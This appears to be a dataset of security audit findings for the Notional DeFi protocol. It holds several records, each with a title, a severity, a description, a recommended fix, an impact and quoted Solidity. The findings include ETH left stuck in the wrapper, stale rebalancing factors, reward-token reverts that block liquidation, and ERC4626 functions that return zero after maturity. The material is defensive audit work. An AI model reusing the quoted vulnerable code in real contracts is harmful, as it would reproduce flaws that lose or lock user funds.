_mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n 
NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? 
WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\nчIf the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.чLoss of assets as the residual ETH is not sent to the users.ч```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n -Residual ETH not sent back when `batchBalanceAndTradeAction` executedчhighчResidual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. 
In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. 
Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, \"ETH Balance\");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. 
Thus, the residual ETH will not be sent back to the users and stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\nчIf the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.чLoss of assets as the residual ETH is not sent to the users.ч```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. 
When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n -_isExternalLendingUnhealthy() using stale factorsчmediumчIn `checkRebalance()` -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount(factors) using stale `factors` will lead to inaccurate `targetAmount`, which in turn will cause `checkRebalance()` that should have been rebalance to not execute.\\nrebalancingBot uses `checkRebalance()` to return the `currencyIds []` that need to be `rebalance`.\\ncall order : `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA very important logic is to get `targetAmount`. The calculation of this value depends on `factors`. But currently used is PrimeCashFactors memory `factors` = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);. This is not the latest. It has not been aggregated yet. 
The correct one should be `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.ч```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\nчDue to the incorrect `targetAmount`, it may cause the `currencyId` that should have been re-executed `Rebalance` to not execute `rebalance`, increasing the risk of the protocol.ч```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n -recover() using the standard transfer may not be able to retrieve some tokensчmediumчin `SecondaryRewarder.recover()` Using the standard `IERC20.transfer()` If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out, because this kind of `token` does not return `bool` This will cause it to always `revert`\\n`SecondaryRewarder.recover()` use for\\nAllows the Notional owner to recover any tokens sent to 
the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\n```\n function recover(address token, uint256 amount) external onlyOwner {\n if (Constants.ETH_ADDRESS == token) {\n (bool status,) = msg.sender.call{value: amount}(\"\");\n require(status);\n } else {\n IERC20(token).transfer(msg.sender, amount);\n }\n }\n```\n\nUsing the standard `IERC20.transfer()` method to execute the transfer: a `token` of a type similar to `USDT` has no return value. This will cause the execution of the transfer to always failч```\n function recover(address token, uint256 amount) external onlyOwner {\n if (Constants.ETH_ADDRESS == token) {\n (bool status,) = msg.sender.call{value: amount}(\"\");\n require(status);\n } else {\n// Remove the line below\n IERC20(token).transfer(msg.sender, amount);\n// Add the line below\n GenericToken.safeTransferOut(token,msg.sender,amount);\n }\n }\n```\nчIf `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out.ч```\n function recover(address token, uint256 amount) external onlyOwner {\n if (Constants.ETH_ADDRESS == token) {\n (bool status,) = msg.sender.call{value: amount}(\"\");\n require(status);\n } else {\n IERC20(token).transfer(msg.sender, amount);\n }\n }\n```\n -Malicious users could block liquidation or perform DOSчmediumчThe current implementation uses a \"push\" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.
An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the 
following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\nчThe current implementation uses a \"push\" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.чMany of the core functionalities of the protocol will be affected by the revert. 
Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.ч```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n -Unexpected behavior when calling certain ERC4626 functionsчmediumчUnexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. 
The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\nчDocument the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.чThe `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. 
The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.ч```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n -getOracleData() maxExternalDeposit not accurateчmediumчin `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. 
This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.чsubtract `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`чAn overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.ч```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = 
IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n -getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdrawчmediumчin `getTargetExternalLendingAmount()` When `targetUtilization == 0`, it directly returns `targetAmount=0`. It lacks the judgment of whether there is enough `externalUnderlyingAvailableForWithdraw`. This may cause `_rebalanceCurrency()` to `revert` due to insufficient balance for `withdraw`.\\nwhen `setRebalancingTargets()` , we can setting all the targets to zero to immediately exit money it will call `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - 
oracleData.externalUnderlyingAvailableForWithdraw\n );\n }\n }\n```\n\nWhen `targetUtilization==0`, it returns `targetAmount ==0`. It lacks the other judgments of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Exceeding `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\n\nFor example: `currentExternalUnderlyingLend = 100` `externalUnderlyingAvailableForWithdraw = 99` If `targetUtilization` is modified to `0`, then `targetAmount` should be `1`, not `0`. `0` will cause an error due to insufficient available balance for withdrawal.\n\nSo, it should still try to withdraw as much deposit as possible first, wait for replenishment, and then withdraw the remaining deposit until the deposit is cleared.чRemove `targetUtilization == 0` directly returning 0.\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\n```\n function getTargetExternalLendingAmount(\n Token memory underlyingToken,\n PrimeCashFactors memory factors,\n RebalancingTargetData memory rebalancingTargetData,\n OracleData memory oracleData,\n PrimeRate memory pr\n ) internal pure returns (uint256 targetAmount) {\n // Short circuit a zero target\n// Remove the line below\n if (rebalancingTargetData.targetUtilization == 0) return 0;\n```\nчA too small `targetAmount` may cause AAVE withdraw to fail, thereby causing `setRebalancingTargets()` to fail.ч```\n function getTargetExternalLendingAmount(\n Token memory underlyingToken,\n PrimeCashFactors memory factors,\n RebalancingTargetData memory rebalancingTargetData,\n OracleData memory oracleData,\n PrimeRate memory pr\n ) internal pure returns (uint256 targetAmount) {\n // Short circuit a zero target\n if (rebalancingTargetData.targetUtilization == 0) return 0;\n\n// rest of code.\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\n uint256 forRedemption =
oracleData.currentExternalUnderlyingLend - targetAmount;\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\n targetAmount = targetAmount.add(\n // unchecked - is safe here, overflow is not possible due to above if conditional\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\n );\n }\n }\n```\n -getTargetExternalLendingAmount() targetAmount may be far less than the correct valueчmediumчWhen calculating `ExternalLending.getTargetExternalLendingAmount()`, it restricts `targetAmount` to be no greater than `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` includes the protocol deposit `currentExternalUnderlyingLend`. This may result in the returned quantity being far less than the correct quantity.\nIn `getTargetExternalLendingAmount()`, it restricts `targetAmount` to be no greater than `oracleData.maxExternalDeposit`.\n```\n function getTargetExternalLendingAmount(\n Token memory underlyingToken,\n PrimeCashFactors memory factors,\n RebalancingTargetData memory rebalancingTargetData,\n OracleData memory oracleData,\n PrimeRate memory pr\n ) internal pure returns (uint256 targetAmount) {\n// rest of code\n\n targetAmount = SafeUint256.min(\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\n // token precision here for accurate comparison.
No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n\\nthis is : `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`\\nThe problem is that when calculating `oracleData.maxExternalDeposit`, it does not exclude the existing deposit `currentExternalUnderlyingLend` of the current protocol.\\nFor example: `currentExternalUnderlyingLend = 100` `targetExternalUnderlyingLend = 100` `maxExternalUnderlyingLend = 10000` `oracleData.maxExternalDeposit = 0` (All AAVE deposits include the current deposit currentExternalUnderlyingLend)\\nIf according to the current calculation result: `targetAmount=0`, this will result in needing to withdraw `100`. 
(currentExternalUnderlyingLend - targetAmount)\\nIn fact, only when the calculation result needs to increase the `deposit` (targetAmount > currentExternalUnderlyingLend), it needs to be restricted by `maxExternalDeposit`.\\nThe correct one should be neither deposit nor withdraw, that is, `targetAmount=currentExternalUnderlyingLend = 100`.чOnly when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. 
No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\nчA too small `targetAmount` will cause the withdrawal of deposits that should not be withdrawn, damaging the interests of the protocol.ч```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. 
